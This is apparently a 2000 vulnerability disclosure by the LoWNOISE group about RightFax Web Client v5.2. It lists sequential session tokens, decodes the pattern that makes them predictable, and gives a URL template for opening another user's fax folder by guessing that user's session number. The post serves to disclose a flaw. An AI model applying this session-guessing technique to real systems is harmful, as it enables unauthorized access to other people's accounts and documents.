[LoWNOISE Colombia 2000]
+---[RightFax Web Client v5.2: Hijack user's sessions]
+---[Description]
Using your web browser When you click to log on to the rightfax server,
it opens a new window. In that window you are asked for a username
and password. The Toolbar on the browser is hidden, but if you open
the location toolbar (Netscape: view/show/location toolbar) you will
see something like this:
http://RIGHTFAXHOST/rightfax/fuwww.dll/c=urol2zi29uncz0/?load1
c=urol2zi29uncz0 <-- This is a session number
If you make some conections you will have:
[round 1]
c=ur o l 2 zi29u n c z0
c=ur q 2 1 zi29u n t z0
c=ur r i 0 zi29u p 3 z0
c=ur s x y zi29u p k z0
c=ur u e x zi29u q 6 z0
c=ur v u w zi29u q q z0
c=ur x b v zi29u r 8 z0
c=ur y r u zi29u r p z0
c=us 1 8 t zi29u s 7 z0
c=us 2 o s zi29u s q z0
c=us 4 5 r zi29u t 5 z0
c=us 5 l q zi29u t k z0
c=us 7 2 p zi29u u 1 z0
c=us 8 i o zi29u u f z0
c=us 9 y n zi29u u x z0
c=us b f m zi29u w c z0
[round 2]
c=us b f m zi29v 4 j z0
c=us c v l zi29v 4 x z0
c=us e c k zi29v 5 b z0
c=us f s j zi29v 5 p z0
c=us h 9 i zi29v 6 3 z0
c=us i p h zi29v 6 h z0
c=us k 6 g zi29v 6 y z0
c=us l m f zi29v 7 f z0
c=us n 3 e zi29v 7 r z0
c=us o j d zi29v 8 7 z0
c=us q 0 c zi29v 8 q z0
c=us r g b zi29v 9 4 z0
c=us s w a zi29v 9 o z0
[round 3]
c=ur l o 4 zi29v a 5 z0
c=ur n 5 3 zi29v a k z0
c=ur o l 2 zi29v b 6 z0
c=ur q 2 1 zi29v b k z0
c=ur s x y zi29v b x z0
c=ur u e x zi29v c c z0
c=ur v u w zi29v c r z0
c=ur x b v zi29v d 8 z0
c=ur y r u zi29v d y z0
xxxx a r b xxxxx d r xx
x = the same for all the round
a = a-z,0-9
r = (the next letter from the previous round)
b = 9-0,z-a
d = double (aa-zz,00-99)
THATS NO RANDOM. So you can guess other users session numbers.
So Unhide the location toolbar and make this URL:
http://RIGHTFAXHOST/rightfax/fuwww.dll/c=other-session-number/?FOLDR&FFFF
+---[THE END]
Efrain 'ET' Torres
et_at_cyberspace.org
[LoWNOISE] Colombia 2000
No human rights reserved@, narco-guerrilla.gov.co sucks.
Received on Jan 31 2000
Intro
